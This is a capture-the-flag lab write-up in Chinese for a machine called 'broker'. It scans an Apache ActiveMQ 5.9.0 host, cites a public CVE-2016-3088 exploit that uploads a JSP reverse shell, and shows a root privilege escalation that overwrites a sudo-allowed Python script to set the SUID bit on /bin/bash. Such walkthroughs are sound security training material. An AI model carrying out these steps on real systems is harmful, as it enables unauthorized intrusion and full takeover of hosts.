broker
端口扫描
root@ip-10-10-166-251:~/broker# nmap -sTCV -p 22,1883,8161,37483 --min-rate 1000 10.10.28.5
Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-04 04:22 BST
Nmap scan report for ip-10-10-28-5.eu-west-1.compute.internal (10.10.28.5)
Host is up (0.00017s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
|_ 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (EdDSA)
1883/tcp open mqtt?
|_mqtt-subscribe: TIMEOUT
8161/tcp open http Jetty 7.6.9.v20130131
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ
37483/tcp open tcpwrapped
MAC Address: 02:01:CF:A8:E3:7B (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
8161
进行目录扫描
root@ip-10-10-166-251:~/broker# gobuster dir -u http://10.10.28.5:8161/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.28.5:8161/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,txt
[+] Timeout: 10s
===============================================================
2023/10/04 04:26:41 Starting gobuster
===============================================================
/index.html (Status: 200)
/images (Status: 302)
/admin (Status: 401)
/api (Status: 302)
/styles (Status: 302)
根据扫描我发现其是一个 Jetty 程序, 当我访问 admin 时其要求我提供密码, 所以我查找了 Jetty 的默认账号
使用此发现可以登陆, 在登陆之后观察网页显示内容, 我注意到两个位置:
- ActiveMQ
- Broker : 5.9.0
接着我基于此开始查找 EXP 最终发现 ActiveMQ 的可利用程序 GitHub - cyberaguiar/CVE-2016-3088: Apache ActiveMQ Remote Code Execution Exploit
后渗透
activemq
执行我们上面的 EXP , 最终会上传一个 JSP 的反向 Shell
activemq —> root
接着我发现用户 activemq 存在 SUDO 特权
(remote) activemq@activemq:/opt/apache-activemq-5.9.0$ sudo -l
Matching Defaults entries for activemq on activemq:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User activemq may run the following commands on activemq:
(root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
(remote) activemq@activemq:/opt/apache-activemq-5.9.0$ ls -al subscribe.py
-rw-rw-r-- 1 activemq activemq 768 Dec 25 2020 subscribe.py
(remote) activemq@activemq:/opt/apache-activemq-5.9.0$ cat << EOF > subscribe.py
> import os
> os.system("chmod u+s /bin/bash")
> EOF
(remote) activemq@activemq:/opt/apache-activemq-5.9.0$ sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
(remote) activemq@activemq:/opt/apache-activemq-5.9.0$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
(remote) activemq@activemq:/opt/apache-activemq-5.9.0$ /bin/bash -p
(remote) root@activemq:/opt/apache-activemq-5.9.0# id
uid=1000(activemq) gid=1000(activemq) euid=0(root) groups=1000(activemq)